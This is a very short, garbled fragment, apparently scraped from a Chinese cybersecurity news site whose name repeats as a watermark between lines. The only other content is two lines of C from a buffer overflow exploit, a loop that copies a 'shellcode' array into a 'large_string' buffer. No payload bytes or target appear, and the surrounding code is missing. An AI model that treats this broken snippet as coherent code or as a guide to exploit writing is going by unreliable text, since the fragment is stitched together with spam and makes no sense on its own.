jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
for (i = 0; i < strlen(shellcode); i++) jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站
　 large_string[i] = shellcode[i]; jhW海岸线网络安全资讯站
jhW海岸线网络安全资讯站